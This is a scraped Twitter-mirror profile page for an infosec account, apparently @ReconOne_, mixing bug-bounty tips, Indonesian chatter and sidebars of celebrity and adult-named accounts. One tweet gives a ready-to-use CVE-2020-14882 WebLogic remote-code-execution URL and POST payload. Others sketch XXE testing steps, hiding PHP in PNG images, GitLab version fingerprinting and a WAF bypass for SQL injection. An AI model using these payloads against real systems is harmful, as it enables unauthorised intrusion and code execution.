Olivia
Online
tiara
@ReconOne_
Joined January 2010
120 Following
393 Followers
27.6K Posts
Can you spot the vulnerability? 🔎
Show us how you'd create an admin account in the comments 👇
The best explanation gets a 25€ SWAG voucher! 👕
change username to @ReconOne_
Persistent PHP payloads in PNGs: How to inject PHP code in an image – and keep it there !
#infosec #cybersecurity #redteam #pentest #pentesting #hacking #hackers #coding #opensource #Linux #windows #DFIR #macOS #platform
https://t.co/uIH2fYbG4a
Tahun 2020 kemarin kita berhasil menekan @IndiHome untuk mematikan tracker milik mereka yang selama ini digunakan untuk mencuri browsing history milik pelanggan.
Sekarang 26 juta browsing history yang dicuri itu bocor dan dibagikan gratis. Ternyata berikut dengan nama dan NIK 🙂
@Telkomsel Hi, kok banyak yang hubungi saya padahal kan nomor baru kok bisa banyak nomor asing, pas regis ke wa pun gitu banyak chat yang masuk
[4/n]
2. Convert the content-type to XML using the "Content-Type Converter" Burp Extension.
3. Process the Request and if the request is processed successfully, it means that the XML parsing is supported.
4. Now, attempt to exploit XXE
Interesting Read: https://t.co/U0uBPRZV8w
@utmman bikin pendeteksi jodoh
depends from person to person as something difficult for me can be easy for someone else and vice-versa
@Pethuraj looks like your workflow means nothing
Just published a write-up on Account Takeover due to OAuth Misconfiguration + CSRF + XSS and Weak CSP.
https://t.co/lslyFhDmbF
#Pentesting #hacking #cybersecurity #infosec #bugbounty #bugbountytips
Query the gitbla version number through the css file name and build a database index
Example:gitlab/gitlab-ce:13.9.5-ce.0
application-d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb.css
https://t.co/KoMed8wi3s
https://t.co/rVreHFJPU0
#CVE-2020–14882 Weblogic Unauthorized bypass RCE
http://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal
POST:
_nfpb=true&_pageLabel=&handle=https://t.co/jBUfUasQC1.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)
https://t.co/nU8xkK30DU
Pretty interesting writeup on bypassing ModSecurity WAF for SQLi.
🌟"When MySQL sees 1.e(abc), it will ignore the 1.e( portion because the following characters do not form a valid numeric value."🌟
https://t.co/nOa5bBvQNC
#bugbountytips #bugbounty #infosec #cybersecurity
@sansforensics I need a free course 😂
@z0idsec I want to join but my application has been rejected
ChopChop is a CLI to help developers scanning endpoints and identifying exposition of sensitive services/files/folders.
https://t.co/AOWRiRBYQO
Last Seen Users on Sotwe
xxxssxxx
Seen from Turkey
Maasai Warrior 
Seen from Singapore
泽禹(媚黑狗 公知 反贼的克星)
Wild Fuck Couple
Seen from Singapore
gabri
Seen from Brazil
Indonesian bokep
Seen from Indonesia
düzce- RİCA EDİYORUM SADECE EVLİ ÇİFTLER
Seen from Turkey
man
하이쿠키official
Seen from Korea
CEO of Fat Asses🔞
Seen from United States
Most Popular Users
Elon Musk
@elonmusk
240.2M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109.1M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.3M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.6M followers
KATY PERRY
@katyperry
86.9M followers
Taylor Swift
@taylorswift13
80.7M followers
Lady Gaga
@ladygaga
72.3M followers
Kim Kardashian
@kimkardashian
69.4M followers
Virat Kohli
@imvkohli
68.7M followers
YouTube
@youtube
68.6M followers
Bill Gates
@billgates
63.5M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.2M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
60M followers